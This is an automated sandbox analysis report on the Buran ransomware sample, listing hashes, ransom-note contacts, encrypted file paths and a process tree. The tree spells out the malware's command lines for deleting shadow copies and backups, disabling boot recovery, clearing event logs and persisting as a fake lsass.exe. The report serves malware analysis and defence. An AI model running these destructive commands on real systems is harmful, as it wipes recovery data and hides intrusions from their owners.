Analysis
- max time kernel: 151s
- max time network: 124s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 02-02-2021 01:49
Static task: static1
Behavioral task: behavioral1
  Sample: buran.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: buran.exe
  Resource: win10v20201028
General
- Target: buran.exe
- Size: 222KB
- MD5: 3058d76e5fb2f2d2f65e232e98536182
- SHA1: 3e6e9abd6241526bf932885d118cbbe54e4e1cbe
- SHA256: 5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
- SHA512: b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
Malware Config
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Wiederherstellung@cock.li
Wiederherstellungsdatei@airmail.cc
Signatures
- Buran
  Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
- Clears Windows event logs (1 TTPs)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Executes dropped EXE (3 IoCs)
  Processes:
  pid | process
  1636 | lsass.exe
  3836 | lsass.exe
  1380 | lsass.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Local Security Authority Subsystem Service = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start" | reg.exe
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
  description | ioc | process
  File opened (read-only) | \??\H: | lsass.exe
  File opened (read-only) | \??\F: | lsass.exe
  File opened (read-only) | \??\Y: | lsass.exe
  File opened (read-only) | \??\T: | lsass.exe
  File opened (read-only) | \??\K: | lsass.exe
  File opened (read-only) | \??\Z: | lsass.exe
  File opened (read-only) | \??\R: | lsass.exe
  File opened (read-only) | \??\U: | lsass.exe
  File opened (read-only) | \??\S: | lsass.exe
  File opened (read-only) | \??\N: | lsass.exe
  File opened (read-only) | \??\J: | lsass.exe
  File opened (read-only) | \??\I: | lsass.exe
  File opened (read-only) | \??\E: | lsass.exe
  File opened (read-only) | \??\X: | lsass.exe
  File opened (read-only) | \??\V: | lsass.exe
  File opened (read-only) | \??\A: | lsass.exe
  File opened (read-only) | \??\P: | lsass.exe
  File opened (read-only) | \??\O: | lsass.exe
  File opened (read-only) | \??\M: | lsass.exe
  File opened (read-only) | \??\L: | lsass.exe
  File opened (read-only) | \??\G: | lsass.exe
  File opened (read-only) | \??\B: | lsass.exe
  File opened (read-only) | \??\W: | lsass.exe
  File opened (read-only) | \??\Q: | lsass.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  8 | geoiptool.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Drops file in Program Files directory (21789 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File created | C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_13d.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\SmallTile.scale-200.png | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\MedTile.scale-125.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\bv_60x42.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-unplated_contrast-black.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7834_32x32x32.png | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-ul-oob.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-BOLD.TTF | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\CubeTile_contrast-white.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\images\OfficeHubLogo_310x150.png | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Ion.thmx | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_DE-DE.respack | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-32_altform-unplated.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-100_contrast-white.png | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_WorriedEye.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.scale-200.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\acrobat_parcel_generic_32.svg.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Undo\Undo-press.mobile.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\friends_activity.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\et_16x11.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeWideTile.scale-200.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-oob.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Resources\Fonts\StorMDL2.ttf | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail.png.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons.png.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe.config | lsass.exe
  File created | C:\Program Files\Java\jdk1.8.0_66\db\bin\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80_altform-unplated_contrast-white.png | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js | lsass.exe
  File opened for modification | C:\Program Files\MeasureGroup.7z.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\AppList.scale-150.png | lsass.exe
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-pl.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\lipssealed.png | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-30.png | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\access-bridge-64.jar.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.ELM.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo | lsass.exe
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\ui-strings.js | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF | lsass.exe
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\Java\jre1.8.0_66\release.[17C729A0-DE24-D128-25CD-456E344875E9] | lsass.exe
  File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72_altform-unplated.png | lsass.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
  pid | process
  3820 | vssadmin.exe
- Modifies system certificate store
  Processes:
  description | ioc | process
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | buran.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | buran.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious use of AdjustPrivilegeToken (52 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1636 | lsass.exe
  Token: SeIncreaseQuotaPrivilege | 188 | WMIC.exe
  Token: SeSecurityPrivilege | 188 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 188 | WMIC.exe
  Token: SeLoadDriverPrivilege | 188 | WMIC.exe
  Token: SeSystemProfilePrivilege | 188 | WMIC.exe
  Token: SeSystemtimePrivilege | 188 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 188 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 188 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 188 | WMIC.exe
  Token: SeBackupPrivilege | 188 | WMIC.exe
  Token: SeRestorePrivilege | 188 | WMIC.exe
  Token: SeShutdownPrivilege | 188 | WMIC.exe
  Token: SeDebugPrivilege | 188 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 188 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 188 | WMIC.exe
  Token: SeUndockPrivilege | 188 | WMIC.exe
  Token: SeManageVolumePrivilege | 188 | WMIC.exe
  Token: 33 | 188 | WMIC.exe
  Token: 34 | 188 | WMIC.exe
  Token: 35 | 188 | WMIC.exe
  Token: 36 | 188 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 188 | WMIC.exe
  Token: SeSecurityPrivilege | 188 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 188 | WMIC.exe
  Token: SeLoadDriverPrivilege | 188 | WMIC.exe
  Token: SeSystemProfilePrivilege | 188 | WMIC.exe
  Token: SeSystemtimePrivilege | 188 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 188 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 188 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 188 | WMIC.exe
  Token: SeBackupPrivilege | 188 | WMIC.exe
  Token: SeRestorePrivilege | 188 | WMIC.exe
  Token: SeShutdownPrivilege | 188 | WMIC.exe
  Token: SeDebugPrivilege | 188 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 188 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 188 | WMIC.exe
  Token: SeUndockPrivilege | 188 | WMIC.exe
  Token: SeManageVolumePrivilege | 188 | WMIC.exe
  Token: 33 | 188 | WMIC.exe
  Token: 34 | 188 | WMIC.exe
  Token: 35 | 188 | WMIC.exe
  Token: 36 | 188 | WMIC.exe
  Token: SeBackupPrivilege | 4088 | vssvc.exe
  Token: SeRestorePrivilege | 4088 | vssvc.exe
  Token: SeAuditPrivilege | 4088 | vssvc.exe
  Token: SeSecurityPrivilege | 2120 | wevtutil.exe
  Token: SeBackupPrivilege | 2120 | wevtutil.exe
  Token: SeSecurityPrivilege | 2748 | wevtutil.exe
  Token: SeBackupPrivilege | 2748 | wevtutil.exe
  Token: SeSecurityPrivilege | 1400 | wevtutil.exe
  Token: SeBackupPrivilege | 1400 | wevtutil.exe
- Suspicious use of WriteProcessMemory (102 IoCs)
  Processes:
  description | pid | process | target process
  PID 1052 wrote to memory of 208 | 1052 | buran.exe | cmd.exe
  PID 1052 wrote to memory of 208 | 1052 | buran.exe | cmd.exe
  PID 1052 wrote to memory of 208 | 1052 | buran.exe | cmd.exe
  PID 208 wrote to memory of 2540 | 208 | cmd.exe | reg.exe
  PID 208 wrote to memory of 2540 | 208 | cmd.exe | reg.exe
  PID 208 wrote to memory of 2540 | 208 | cmd.exe | reg.exe
  PID 1052 wrote to memory of 1636 | 1052 | buran.exe | lsass.exe
  PID 1052 wrote to memory of 1636 | 1052 | buran.exe | lsass.exe
  PID 1052 wrote to memory of 1636 | 1052 | buran.exe | lsass.exe
  PID 1052 wrote to memory of 1056 | 1052 | buran.exe | cmd.exe
  PID 1052 wrote to memory of 1056 | 1052 | buran.exe | cmd.exe
  PID 1052 wrote to memory of 1056 | 1052 | buran.exe | cmd.exe
  PID 1056 wrote to memory of 2100 | 1056 | cmd.exe | PING.EXE
  PID 1056 wrote to memory of 2100 | 1056 | cmd.exe | PING.EXE
  PID 1056 wrote to memory of 2100 | 1056 | cmd.exe | PING.EXE
  PID 1636 wrote to memory of 2356 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2356 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2356 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3184 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3184 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3184 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3012 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3012 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3012 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3588 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3588 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3588 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3204 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3204 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3204 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 1160 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 1160 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 1160 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2504 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2504 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2504 | 1636 | lsass.exe | cmd.exe
  PID 2504 wrote to memory of 188 | 2504 | cmd.exe | WMIC.exe
  PID 2504 wrote to memory of 188 | 2504 | cmd.exe | WMIC.exe
  PID 2504 wrote to memory of 188 | 2504 | cmd.exe | WMIC.exe
  PID 1636 wrote to memory of 2208 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2208 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2208 | 1636 | lsass.exe | cmd.exe
  PID 2208 wrote to memory of 3820 | 2208 | cmd.exe | vssadmin.exe
  PID 2208 wrote to memory of 3820 | 2208 | cmd.exe | vssadmin.exe
  PID 2208 wrote to memory of 3820 | 2208 | cmd.exe | vssadmin.exe
  PID 1636 wrote to memory of 3052 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3052 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 3052 | 1636 | lsass.exe | cmd.exe
  PID 3052 wrote to memory of 3576 | 3052 | cmd.exe | reg.exe
  PID 3052 wrote to memory of 3576 | 3052 | cmd.exe | reg.exe
  PID 3052 wrote to memory of 3576 | 3052 | cmd.exe | reg.exe
  PID 1636 wrote to memory of 496 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 496 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 496 | 1636 | lsass.exe | cmd.exe
  PID 496 wrote to memory of 2392 | 496 | cmd.exe | reg.exe
  PID 496 wrote to memory of 2392 | 496 | cmd.exe | reg.exe
  PID 496 wrote to memory of 2392 | 496 | cmd.exe | reg.exe
  PID 1636 wrote to memory of 2588 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2588 | 1636 | lsass.exe | cmd.exe
  PID 1636 wrote to memory of 2588 | 1636 | lsass.exe | cmd.exe
  PID 2588 wrote to memory of 2452 | 2588 | cmd.exe | reg.exe
  PID 2588 wrote to memory of 2452 | 2588 | cmd.exe | reg.exe
  PID 2588 wrote to memory of 2452 | 2588 | cmd.exe | reg.exe
  PID 1636 wrote to memory of 1276 | 1636 | lsass.exe | cmd.exe
- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes
C:\Users\Admin\AppData\Local\Temp\buran.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\buran.exe"
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\Admin\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\Admin\AppData\Local\Temp\buran.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"
      - Adds Run key to start application
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
    command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wbadmin delete backup
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\Wbem\WMIC.exe
        command line: wmic shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\vssadmin.exe
        command line: vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        command line: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        command line: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        command line: reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
      C:\Windows\SysWOW64\attrib.exe
        command line: attrib "C:\Users\Admin\documents\Default.rdp" -s -h
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
      C:\Windows\SysWOW64\wevtutil.exe
        command line: wevtutil.exe clear-log Application
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
      C:\Windows\SysWOW64\wevtutil.exe
        command line: wevtutil.exe clear-log Security
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
      C:\Windows\SysWOW64\wevtutil.exe
        command line: wevtutil.exe clear-log System
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
      C:\Windows\SysWOW64\sc.exe
        command line: sc config eventlog start=disabled
    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
      command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
      - Executes dropped EXE
      - Drops file in Program Files directory
    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
      command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 1
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\Admin\AppData\Local\Temp\buran.exe" & if not exist "C:\Users\Admin\AppData\Local\Temp\buran.exe" exit )
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\PING.EXE
      command line: ping -n 3 127.1
      - Runs ping.exe
C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
